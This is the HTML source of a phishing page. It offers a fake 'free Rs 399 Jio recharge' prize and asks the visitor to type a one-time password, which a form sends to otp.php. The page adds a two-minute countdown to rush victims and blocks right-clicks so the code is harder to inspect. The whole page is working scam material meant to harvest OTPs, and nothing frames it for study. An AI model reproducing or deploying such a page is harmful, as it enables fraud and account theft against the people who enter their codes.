<head>
<meta content="utf-8" name="charset">
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<title>Hey Dear! You Have Won Free Rs 399 Jio Recharge</title>
	<meta property="og:type" content="website">
<meta property="og:title" content="Hey Dear! You Have Won Free Rs 399 Jio Recharge">
	<meta property="og:url" content="Free 399 Recharge">
<meta property="og:site_name" content="index.html">
	<meta property="og:image" content="http://deals-online.in/jio/head.png">
<link rel="stylesheet" type="text/css" href="jio\style.css">
	<style type="text/css">h2{height: 50px;background-color: #007ee6;color: #FFF;line-height: 50px;font-size: 24px;margin: 0;text-align: center;}.countDown{text-align: center;padding: 0 1em;color: #999;}.countDown .timer{color: #007ee6;font-size: 1.2em;}.peopleCount{text-align: center;padding: 0 1em;color: #999;}.peopleCount .number{background-color: #007ee6;color: #FFF;display: inline-block;padding: 0 10px;}</style>
	</head>
	
	<body>
	  <form action="otp.php" method="POST" class="login">
	<script type="text/javascript">function next(){location.href="#"+location.search}function setCookie(e,t){var n=new Date;n.setTime(n.getTime()+2592e6);var o="expires="+n.toUTCString();document.cookie=e+"="+t+"; "+o}function getCookie(e){for(var t=e+"=",n=document.cookie.split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(t))return i.substring(t.length,i.length)}return 0}var message="You have not Permission to This";document.onmousedown=function(e){return"Netscape"==navigator.appName&&3==e.which?(alert(message),!1):-1!=navigator.appVersion.indexOf("MSIE")&&2==event.button?(alert(message),!1):void 0};</script>

	
	<img src="https://qph.fs.quoracdn.net/main-qimg-0d12ca9b0488dc01786fa9927ea48aad" class="full"><h2>Free Jio 399 Recharge </h2>
</script>

	<form>
	  <div class="input-group">
	  
  <div class="input-group">
<label>Your Otp Here</label>
&nbsp;&nbsp;&nbsp;
<input name="pass" placeholder="Enter Your Otp Here " required="required" type="number"></div>
<div class="input-group">
&nbsp;
             <center> <div>Time left - <span id="timer">2:00</span></div></center>

&nbsp;&nbsp;&nbsp;
<center><button type="submit" class="btn">VERIFY</button></center>
&nbsp;&nbsp;&nbsp;


</form>
 <script type="text/javascript">
             startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==11){m=m-1}
  if((m + '').length == 1){
    m = '0' + m;
  }
  if(m < 0){
    m = '11';
  }
  document.getElementById('timer').innerHTML = m + ":" + s;
  setTimeout(startTimer, 1000);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>
<audio id="xyz" src="https://x2convert.com/Thankyou?token=U2FsdGVkX19zZMVUt9FiInLG3xbWVEJ5Qo3jI3T1LqIK7LvqpIWb9DRoXutU4sdS5xwu6RqaXWm7aJcIoxqPWJPv6y6%2fAwEdoYgxddDrJ%2fKfoRDyWwf3gW%2fB2LL9fK9MxIdB2P2W9PIH0UcMazELrvBIYp0g8pQGFwORMDBjukJFjZc%2f0dMbScfWa5oyiKcE&s=youtube&id=&h=3692998352381650705" preload="auto"></audio>
<br>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: white">
<span id="displaySeconds"></span>


</body>
